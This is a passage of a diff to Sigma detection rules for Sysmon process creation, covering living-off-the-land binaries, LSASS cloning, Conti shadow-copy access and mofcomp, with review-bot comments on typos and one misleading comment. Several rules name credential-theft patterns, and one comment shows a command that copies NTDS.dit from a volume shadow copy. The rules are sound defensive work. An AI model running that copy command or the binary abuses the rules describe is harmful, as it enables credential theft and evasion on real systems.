--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml
@@ -1,8 +1,7 @@ title: Suspicious GrpConv Execution id: f14e169e-9978-4c69-acb3-1cff8200bc36 status: test -description: Detects the suspicious execution of a utility to convert Windows 3.x - .grp files or for persistence purposes by malicious software or actors +description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors references: - https://twitter.com/0gtweet/status/1526833181831200770 author: Florian Roth (Nextron Systems)
@@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - grpconv.exe -o - grpconv -o condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
index 999353fb8..85f1b3e97 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml
@@ -22,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sqldumper.exe - CommandLine|contains: + CommandLine|contains: - '0x0110' - 0x01100:40 condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
index 311e688e4..b23f51d3d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
@@ -1,8 +1,8 @@ title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code id: fbd7c32d-db2a-4418-b92c-566eb8911133 related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: obsoletes + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: obsoletes status: test description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. references:
@@ -23,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SyncAppvPublishingServer.exe - - OriginalFileName: syncappvpublishingserver.exe + - Image|endswith: \SyncAppvPublishingServer.exe + - OriginalFileName: syncappvpublishingserver.exe selection_cli: - CommandLine|contains: '"n; ' + CommandLine|contains: '"n; ' condition: process_creation and (all of selection_*) fields: - ComputerName
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
index 61485355f..2308f3d73 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
@@ -21,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SyncAppvPublishingServer.vbs - - ; + - ; # at a minimum, a semi-colon is required condition: process_creation and selection fields: - ComputerName
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml
index fa774f427..1ac519c7e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml
@@ -19,15 +19,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \tracker.exe - - Description: Tracker + - Image|endswith: \tracker.exe + - Description: Tracker selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' /c ' filter_msbuild1: - CommandLine|contains: ' /ERRORREPORT:PROMPT ' + CommandLine|contains: ' /ERRORREPORT:PROMPT ' filter_msbuild2: + # Example: + # GrandparentImage: C:\Program Files\Microsoft Visual Studio\2022\Community\Msbuild\Current\Bin\MSBuild.exe + # ParentCommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" /nologo /nodemode:1 /nodeReuse:true /low:false + # CommandLine: "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Tracker.exe" @"C:\Users\user\AppData\Local\Temp\tmp05c7789bc5534838bf96d7a0fed1ffff.tmp" /c "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.29.30133\bin\HostX86\x64\Lib.exe" ParentImage|endswith: - \Msbuild\Current\Bin\MSBuild.exe - \Msbuild\Current\Bin\amd64\MSBuild.exe
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml
index 8bb4464ac..3c6f59fd1 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml
@@ -1,8 +1,7 @@ title: Use of TTDInject.exe id: b27077d6-23e6-45d2-81a0-e2b356eea5fd status: test -description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 - and newer to debug time travel (underlying call of tttracer.exe) +description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) references: - https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ author: frack113
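Review bot: The reflowed description on the new side of the proc_creation_win_lolbin_ttdinject.yml hunk keeps the typo "executiob" ("Detects the executiob of TTDInject.exe"); since the line is rewritten anyway, it should read `description: Detects the execution of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)`. The same applies to two later description reflows in this patch: proc_creation_win_lsass_process_clone.yml keeps "LSASS process process clone" (one "process" too many) and proc_creation_win_mftrace_child_process.yml keeps "which can abused" (missing "be"). These strings are what analysts see in alert output, so they are worth correcting in the same pass.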
@@ -19,8 +18,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: ttdinject.exe - - OriginalFileName: TTDInject.EXE + - Image|endswith: ttdinject.exe + - OriginalFileName: TTDInject.EXE condition: process_creation and selection falsepositives: - Legitimate use
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
index a5e7454c2..0de61c3b6 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
@@ -1,16 +1,15 @@ title: Time Travel Debugging Utility Usage id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a related: - - id: e76c8240-d68f-4773-8880-5c6f63595aaf - type: derived + - id: e76c8240-d68f-4773-8880-5c6f63595aaf + type: derived status: test -description: Detects usage of Time Travel Debugging Utility. Adversaries can execute - malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ - https://twitter.com/mattifestation/status/1196390321783025666 - https://twitter.com/oulusoyum/status/1191329746069655553 -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/06 modified: 2022/10/09 tags:
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml
index 40e0930e5..74bc19555 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_type.yml
@@ -1,8 +1,7 @@ title: Potential Download/Upload Activity Using Type Command id: aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f status: test -description: Detects usage of the "type" command to download/upload data from WebDAV - server +description: Detects usage of the "type" command to download/upload data from WebDAV server references: - https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 author: Nasreddine Bencherchali (Nextron Systems)
@@ -15,17 +14,18 @@ logsource: product: windows category: process_creation detection: + # Note that since built in CMD commands do not trigger a process creation. This would be detected only if used in a "/c" command process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_upload: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > \\\\' selection_download: - CommandLine|contains|all: + CommandLine|contains|all: - type \\\\ - - ' > ' + - ' > ' # Space are added to increase atom length and speed up matching. If your backend can handle this remove the space condition: process_creation and (1 of selection_*) falsepositives: - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml
index eef4d9d7f..523bf8404 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml
@@ -1,8 +1,7 @@ title: Lolbin Unregmp2.exe Use As Proxy id: 727454c0-d851-48b0-8b89-385611ab0704 status: test -description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom - version of "wmpnscfg.exe" +description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe" references: - https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/ author: frack113
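Review bot: The comment added under `detection:` in the second hunk of proc_creation_win_lolbin_type.yml is a sentence fragment ("Note that since built in CMD commands do not trigger a process creation. This would be detected only if ..."), and the inline comment on the `' > '` item says "Space are added"; both read as unfinished drafts. Suggested wording: `# Note: "type" is a built-in CMD command and does not trigger a process creation event by itself; this rule only sees it when it is passed to cmd with "/c"` and `# Spaces are added to increase atom length and speed up matching. If your backend can handle this, remove the spaces`. The first point is a coverage limit of the rule, so it is worth restating in the description rather than only in a comment.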
@@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \unregmp2.exe - - OriginalFileName: unregmp2.exe + - Image|endswith: \unregmp2.exe + - OriginalFileName: unregmp2.exe selection_cmd: - CommandLine|contains: ' /HideWMP' + CommandLine|contains: ' /HideWMP' condition: process_creation and (all of selection_*) falsepositives: - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml
index 053e30938..845a4c299 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml
@@ -1,8 +1,7 @@ title: UtilityFunctions.ps1 Proxy Dll id: 0403d67d-6227-4ea8-8145-4e72db7da120 status: test -description: Detects the use of a Microsoft signed script executing a managed DLL - with PowerShell. +description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. references: - https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/ author: frack113
@@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - UtilityFunctions.ps1 - 'RegSnapin ' condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
index 2ad676e6b..85c55bc90 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
@@ -1,11 +1,10 @@ title: Visual Basic Command Line Compiler Usage id: 7b10f171-7f04-47c7-9fa2-5be43c76e535 status: test -description: Detects successful code compilation via Visual Basic Command Line Compiler - that utilizes Windows Resource to Object Converter. +description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. references: - https://lolbas-project.github.io/lolbas/Binaries/Vbc/ -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/07 modified: 2021/11/27 tags:
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
index 741d81a2c..6a3207a16 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
@@ -1,8 +1,7 @@ title: Use of VisualUiaVerifyNative.exe id: b30a8bc5-e21b-4ca2-9420-0a94019ac56a status: test -description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass - and is listed in Microsoft's recommended block rules. +description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \VisualUiaVerifyNative.exe - - OriginalFileName: VisualUiaVerifyNative.exe + - Image|endswith: \VisualUiaVerifyNative.exe + - OriginalFileName: VisualUiaVerifyNative.exe condition: process_creation and selection falsepositives: - Legitimate testing of Microsoft UI parts.
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
index 6a743815c..c31321565 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
@@ -1,8 +1,7 @@ title: Use of VSIISExeLauncher.exe id: 18749301-f1c5-4efc-a4c3-276ff1f5b6f8 status: test -description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can - be used to execute arbitrary binaries +description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VSIISExeLauncher.exe - - OriginalFileName: VSIISExeLauncher.exe + - Image|endswith: \VSIISExeLauncher.exe + - OriginalFileName: VSIISExeLauncher.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' -a ' condition: process_creation and (all of selection*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml
index 6baf577a3..3a46fa476 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml
@@ -1,8 +1,7 @@ title: Use of Wfc.exe id: 49be8799-7b4d-4fda-ad23-cafbefdebbc5 status: test -description: The Workflow Command-line Compiler can be used for AWL bypass and is - listed in Microsoft's recommended block rules. +description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@@ -20,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \wfc.exe - - OriginalFileName: wfc.exe + - Image|endswith: \wfc.exe + - OriginalFileName: wfc.exe condition: process_creation and selection falsepositives: - Legitimate use by a software developer
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml
index a7995890f..51fea8a01 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml
@@ -19,24 +19,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_child_img: - - Image|endswith: \wlrmdr.exe - - OriginalFileName: WLRMNDR.EXE + - Image|endswith: \wlrmdr.exe + - OriginalFileName: WLRMNDR.EXE selection_child_cli: - CommandLine|contains|all: + CommandLine|contains|all: + # Note that the dash "-" can be replaced with a slash "/" (TODO: Use the "windash" modifier when it's introduced) - '-s ' - '-f ' - '-t ' - '-m ' - '-a ' - '-u ' - selection_parent: + selection_parent: # This selection is looking for processes spawned from wlrmdr using the "-u" flag ParentImage|endswith: \wlrmdr.exe filter: ParentImage: C:\Windows\System32\winlogon.exe filter_null: ParentImage: '-' - condition: process_creation and (selection_parent or (all of selection_child_* - and not 1 of filter*)) + condition: process_creation and (selection_parent or (all of selection_child_* and not 1 of filter*)) falsepositives: - Unknown level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
index bb188182b..4dc38e99a 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
@@ -1,8 +1,7 @@ title: Microsoft Workflow Compiler Execution id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d status: test -description: Detects invocation of Microsoft Workflow Compiler, which may permit the - execution of arbitrary unsigned code. +description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. references: - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
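Review bot: The comment attached to `selection_parent` in proc_creation_win_lolbin_wlrmdr.yml says the selection looks for processes spawned from wlrmdr using the "-u" flag, but the selection only contains `ParentImage|endswith: \wlrmdr.exe`; nothing checks the parent's command line, so every child of wlrmdr.exe matches regardless of flags. Either reword the comment to what is actually matched, e.g. `selection_parent: # Any child process of wlrmdr.exe (the parent's "-u" flag is not checked here)`, or add a `ParentCommandLine|contains: '-u '` constraint if the flag is meant to be part of the selection. A reader of the condition otherwise expects a narrower branch than the rule implements.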
@@ -24,8 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Microsoft.Workflow.Compiler.exe - - OriginalFileName: Microsoft.Workflow.Compiler.exe + - Image|endswith: \Microsoft.Workflow.Compiler.exe + - OriginalFileName: Microsoft.Workflow.Compiler.exe condition: process_creation and selection fields: - CommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml b/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml
index 199b243e2..760a5d85e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml
@@ -1,10 +1,7 @@ title: Potential Register_App.Vbs LOLScript Abuse id: 28c8f68b-098d-45af-8d43-8089f3e35403 status: test -description: Detects potential abuse of the "register_app.vbs" script that is part - of the Windows SDK. The script offers the capability to register new VSS/VDS Provider - as a COM+ application. Attackers can use this to install malicious DLLs for persistence - and execution. +description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 - https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs
@@ -23,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cscript.exe - - \wscript.exe - - OriginalFileName: - - cscript.exe - - wscript.exe + - Image|endswith: + - \cscript.exe + - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe selection_cli: - CommandLine|contains: '.vbs -register ' + CommandLine|contains: '.vbs -register ' # register_app.vbs condition: process_creation and (all of selection*) falsepositives: - Other VB scripts that leverage the same starting command line flags
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml b/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml
index 7d569e41a..2458ad7f4 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml
@@ -1,8 +1,7 @@ title: Potential Credential Dumping Via LSASS Process Clone id: c8da0dfd-4ed0-4b68-962d-13c9c884384e status: test -description: Detects a suspicious LSASS process process clone that could be a sign - of credential dumping activity +description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity references: - https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/ - https://twitter.com/Hexacorn/status/1420053502554951689
diff --git a/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml b/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
index 5b55f0ed7..f76099860 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml
@@ -1,8 +1,7 @@ title: Sensitive Registry Access via Volume Shadow Copy id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d status: test -description: Detects a command that accesses password storing registry hives via volume - shadow backups +description: Detects a command that accesses password storing registry hives via volume shadow backups references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
@@ -22,9 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy + # copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 + # There is an additional "\" to escape the special "?" + CommandLine|contains: \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy selection_2: - CommandLine|contains: + CommandLine|contains: - \\NTDS.dit - \\SYSTEM - \\SECURITY
diff --git a/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml b/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml
index 3b6eb5ba3..1f32c732d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml
@@ -21,11 +21,11 @@ detection: Image|endswith: - \wscript.exe - \cscript.exe - CommandLine|contains: + CommandLine|contains: - C:\Users\ - C:\ProgramData\ selection2: - CommandLine|contains: + CommandLine|contains: - .jse - .vbe - .js
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml
index d99b274ae..e67726403 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml
@@ -1,8 +1,7 @@ title: Potential Mftrace.EXE Abuse id: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e status: experimental -description: Detects child processes of the "Trace log generation tool for Media Foundation - Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. +description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
index c71b10860..fb44c46ff 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml
@@ -1,9 +1,7 @@ title: MMC20 Lateral Movement id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd status: test -description: Detects MMC20.Application Lateral Movement; specifically looks for the - spawning of the parent MMC.exe with a command line of "-Embedding" as a child - of svchost.exe +description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe references: - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
@@ -24,7 +22,7 @@ detection: selection: ParentImage|endswith: \svchost.exe Image|endswith: \mmc.exe - CommandLine|contains: -Embedding + CommandLine|contains: -Embedding condition: process_creation and selection falsepositives: - Unlikely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml
index 359660564..7bb2b3f84 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml
@@ -21,17 +21,17 @@ detection: selection1: ParentImage|endswith: \mmc.exe selection2: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - Image|contains: \BITSADMIN + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - Image|contains: \BITSADMIN condition: process_creation and (all of selection*) fields: - CommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml
index bc854e172..869333205 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml
@@ -1,15 +1,10 @@ title: Potential Suspicious Mofcomp Execution id: 1dd05363-104e-4b4a-b963-196a534b03a1 status: experimental -description: 'Detects execution of the "mofcomp" utility as a child of a suspicious - shell or script running utility or by having a suspicious path in the commandline. - - The "mofcomp" utility parses a file containing MOF statements and adds the classes - and class instances defined in the file to the WMI repository. - +description: | + Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. + The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts - - ' references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml 
@@ -29,32 +24,32 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mofcomp.exe - - OriginalFileName: mofcomp.exe + - Image|endswith: \mofcomp.exe + - OriginalFileName: mofcomp.exe selection_case: - - ParentImage|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wsl.exe - - \wscript.exe - - \cscript.exe - - CommandLine|contains: - - \AppData\Local\Temp - - \Users\Public\ - - \WINDOWS\Temp\ - - '%temp%' - - '%tmp%' - - '%appdata%' + - ParentImage|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wsl.exe + - \wscript.exe + - \cscript.exe + - CommandLine|contains: + - \AppData\Local\Temp + - \Users\Public\ + - \WINDOWS\Temp\ + - '%temp%' + - '%tmp%' + - '%appdata%' filter_main_wmiprvse: ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe - CommandLine|contains: C:\Windows\TEMP\ - CommandLine|endswith: .mof + CommandLine|contains: C:\Windows\TEMP\ + CommandLine|endswith: .mof filter_optional_null_parent: - CommandLine|contains: C:\Windows\TEMP\ - CommandLine|endswith: .mof - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider. + CommandLine|contains: C:\Windows\TEMP\ + CommandLine|endswith: .mof + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml
index f802a4d13..a4a5c2679 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml
